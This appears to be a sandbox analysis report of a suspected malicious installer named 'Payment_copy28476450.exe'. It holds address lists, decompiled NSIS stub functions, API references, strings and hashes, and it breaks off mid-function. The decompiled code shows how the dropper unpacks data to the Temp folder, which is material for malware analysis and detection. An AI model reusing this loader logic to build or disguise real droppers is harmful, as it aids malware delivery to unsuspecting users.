0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x00000000
0x0040699c
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00000000
0x00406b0f
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00000000
0x00406964
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}

0x00406001
0x0040600a
0x00000000
0x00406017
0x0040600d
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00406001
FindClose.KERNEL32(00000000), ref: 0040600D

Strings

C:\, xrefs: 00405FF6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED

Uniqueness

Uniqueness Score: -1.00%

Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90;
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x424000 =  *0x423f98 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c;
								if( *0x42374c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80;
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 =  *0x423f80;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403754
0x0040375d
0x00403764
0x00403766
0x0040377a
0x0040378c
0x00403796
0x0040379b
0x004037a1
0x004037b4
0x004037b4
0x004037bf
0x00403768
0x00403773
0x00403773
0x004037c4
0x004037ce
0x004037d7
0x004037dc
0x004037ed
0x00403874
0x0040387c
0x00403885
0x00403885
0x0040389b
0x004038a1
0x004038af
0x0040393e
0x00403946
0x00403950
0x00403955
0x0040395b
0x004039e5
0x004039ea
0x004039ec
0x00403a08
0x00000000
0x00403a08
0x004039ee
0x004039f4
0x004039fc
0x004039fc
0x00000000
0x004039f4
0x00403969
0x00403974
0x00403979
0x0040397b
0x00403982
0x00403982
0x0040398d
0x00403995
0x00403997
0x00403999
0x004039a2
0x004039a5
0x004039ab
0x004039ab
0x004039ca
0x004039db
0x00000000
0x004039e0
0x00403948
0x0040394a
0x00000000
0x004038b5
0x004038b5
0x004038bb
0x004038c5
0x004038cd
0x004038d7
0x004038dd
0x004038eb
0x00403a0d
0x00403a0d
0x00000000
0x00403a0d
0x004038f1
0x004038fa
0x00403939
0x00000000
0x00403939
0x004037f3
0x004037f3
0x004037f8
0x00000000
0x00000000
0x00403802
0x00403812
0x00403817
0x0040381e
0x00000000
0x00000000
0x00403822
0x00403824
0x00403831
0x00403831
0x00403839
0x0040383f
0x00403867
0x0040386f
0x00000000
0x00403851
0x00403852
0x0040385b
0x00403861
0x00403862
0x00000000
0x00403862
0x0040385d
0x0040385f
0x00000000
0x00000000
0x00000000
0x0040385f
0x0040383f

APIs

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Payment_copy28476450.exe",00000000), ref: 004037BF
lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
LoadImageA.USER32 ref: 0040389B

Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66

RegisterClassA.USER32 ref: 004038E2
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
CreateWindowExA.USER32 ref: 00403933
ShowWindow.USER32(00000005,00000000), ref: 00403969
GetClassInfoA.USER32 ref: 00403995
GetClassInfoA.USER32 ref: 004039A2
RegisterClassA.USER32 ref: 004039AB
DialogBoxParamA.USER32 ref: 004039CA

Strings

7B, xrefs: 004038AA
RichEdit, xrefs: 0040399C
1033, xrefs: 0040376E, 004037BA
RichEd32, xrefs: 0040397D
C:\Users\user\AppData\Local\Temp, xrefs: 004037CE, 004037D6, 0040386E, 00403874, 00403884
C:\Users\user\AppData\Local\Temp\, xrefs: 0040375A
Control Panel\Desktop\ResourceLocale, xrefs: 00403782
/B, xrefs: 00403802
_Nb, xrefs: 004038F1, 004038F6
!/B, xrefs: 00403824
.DEFAULT\Control Panel\International, xrefs: 004037AA
RichEdit20A, xrefs: 0040398D, 00403993
.exe, xrefs: 00403841
RichEd20, xrefs: 0040396F
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00403752

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\Payment_copy28476450.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3610923155
Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					if( *0x423f94 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403207( *0x423f94 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x702ba
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f94 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417120; // 0x4c4b0
							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423f94 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c96
0x00402c99
0x00402cb3
0x00402cb8
0x00402ccb
0x00402cd0
0x00402cd6
0x00000000
0x00402cd8
0x00402ce9
0x00402cfa
0x00402d01
0x00402d09
0x00402d0e
0x00402d10
0x00402e00
0x00402e02
0x00402e0e
0x00000000
0x00000000
0x00402e17
0x00402e43
0x00402e48
0x00402e53
0x00402e55
0x00402e66
0x00402e81
0x00402e8a
0x00402e8f
0x00402eae
0x00402ebe
0x00402ed0
0x00402ed5
0x00402edd
0x00402eea
0x00402ef2
0x00402ef7
0x00402ef9
0x00402ef9
0x00402f01
0x00402f01
0x00402f04
0x00402f05
0x00402f05
0x00402f08
0x00402f0a
0x00402f0a
0x00402f0d
0x00402f14
0x00402f20
0x00000000
0x00402f25
0x00000000
0x00402edd
0x00000000
0x00402e91
0x00402e1f
0x00402e31
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d16
0x00402d16
0x00402d1b
0x00402d1f
0x00402d26
0x00402d2d
0x00402d2f
0x00402d2f
0x00402d37
0x00402d3e
0x00402e9d
0x00402edf
0x00000000
0x00402edf
0x00402d4a
0x00402dce
0x00402dd1
0x00402dd6
0x00000000
0x00402dce
0x00402d57
0x00402d5c
0x00402d64
0x00402d8a
0x00402d90
0x00402d99
0x00402d9f
0x00402da4
0x00402daa
0x00000000
0x00000000
0x00402db4
0x00402dbc
0x00402dbf
0x00402dc4
0x00402dc6
0x00402dc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00402db4
0x00402dd7
0x00402ddd
0x00402ded
0x00402ded
0x00402df0
0x00402df6
0x00402df8
0x00000000
0x00402d16

APIs

GetTickCount.KERNEL32 ref: 00402C9C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment_copy28476450.exe,00000400), ref: 00402CB8

Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Payment_copy28476450.exe,80000000,00000003), ref: 004059D6
Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_copy28476450.exe,C:\Users\user\Desktop\Payment_copy28476450.exe,80000000,00000003), ref: 00402D01
GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
C:\Users\user\Desktop\Payment_copy28476450.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
Error launching installer, xrefs: 00402CD8
soft, xrefs: 00402D78
Inst, xrefs: 00402D6F
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
Null, xrefs: 00402D81
C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00402C88

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Payment_copy28476450.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_copy28476450.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-905975996
Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
